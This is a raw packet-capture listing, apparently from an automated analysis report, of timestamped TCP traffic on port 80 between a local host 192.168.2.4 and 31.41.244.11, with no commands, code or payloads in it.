                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.524432898 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.524446011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.524496078 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.525332928 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.525346041 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.525393009 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.526026011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.526070118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.526851892 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.526905060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.527704000 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.527715921 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.527765989 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.528659105 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.528702021 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.528717995 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.528729916 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.528764009 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.529498100 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.529597998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.530277967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.530303001 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.530343056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.530343056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.531306028 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.531326056 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.531363964 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.531482935 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.532048941 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.532061100 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.532123089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.532959938 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.532972097 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.533041954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.533041954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.533826113 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.534686089 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.534698009 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.534708977 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.534791946 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.534791946 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.535614967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.536493063 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.536653996 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.537377119 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.537389040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.537400007 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.537429094 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.537483931 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.538074017 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.538101912 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.538149118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.538794994 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.538839102 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.539597034 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.539609909 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.539649010 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.540621996 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.540633917 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.540683031 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.540736914 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.541460037 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.541474104 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.541568041 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.542330980 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.542382956 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.543085098 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.543133974 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.544817924 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.544918060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.628706932 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675307989 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675410032 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675421953 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675609112 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675697088 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675796032 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.675875902 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676006079 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676167011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676367998 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676404953 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676559925 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.676899910 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677058935 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677155018 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677314997 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677485943 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677555084 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677704096 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.677771091 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.678591967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.678603888 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.678642988 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.679831982 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.679847002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.679913998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.679913998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.680751085 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.680763960 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.680809021 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.680809021 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.681972027 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.681991100 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.682030916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.682030916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.685489893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.685503006 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.685558081 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.689717054 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.689815998 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.689835072 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.689914942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.689914942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.690654039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.690704107 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.693382025 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.693394899 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.693434000 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.693459988 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.696400881 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.696428061 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.696481943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.696481943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.697612047 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.697627068 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.697689056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.701648951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.701759100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.702248096 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.702389002 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855251074 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855323076 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855756044 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855771065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855782032 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855812073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855832100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855832100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.855873108 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857103109 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857134104 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857146025 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857158899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857187986 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.857187986 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.859103918 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.859117985 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.859335899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861233950 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861247063 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861279964 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861291885 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861299038 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861301899 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861314058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861339092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861345053 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861345053 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861350060 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861371040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861372948 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861382961 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861399889 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861403942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861417055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861445904 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861457109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861457109 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861457109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861479998 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861490965 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861490965 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861504078 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861515045 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861517906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861541033 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861552954 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861558914 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861558914 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861577988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861587048 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861589909 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861610889 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861622095 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861624002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861639023 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861649036 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861651897 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861660004 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861677885 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861680031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861691952 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861701012 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861706972 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861706972 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861715078 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861717939 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861732006 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861742020 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861745119 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861752987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861784935 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861794949 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861804962 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861804962 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861824036 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861829042 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861835003 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861865044 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861876011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861880064 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861880064 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861897945 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861907959 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861917019 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861917019 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861917973 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861929893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861947060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861947060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861957073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861968040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861973047 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861990929 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.861995935 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862004042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862029076 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862034082 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862034082 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862040997 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862068892 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.862095118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900158882 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900171041 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900191069 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900202036 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900228977 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900233030 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900245905 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900258064 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900279999 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900291920 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900306940 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900315046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900316954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900326967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900341988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900347948 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900358915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900369883 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900379896 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900388002 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900412083 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900417089 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900429964 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900430918 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900454044 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900540113 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.900994062 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901113033 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901422977 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901478052 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901631117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901647091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901658058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901670933 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901681900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901690960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901690960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901694059 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.901710987 CET804973531.41.244.11192.168.2.4
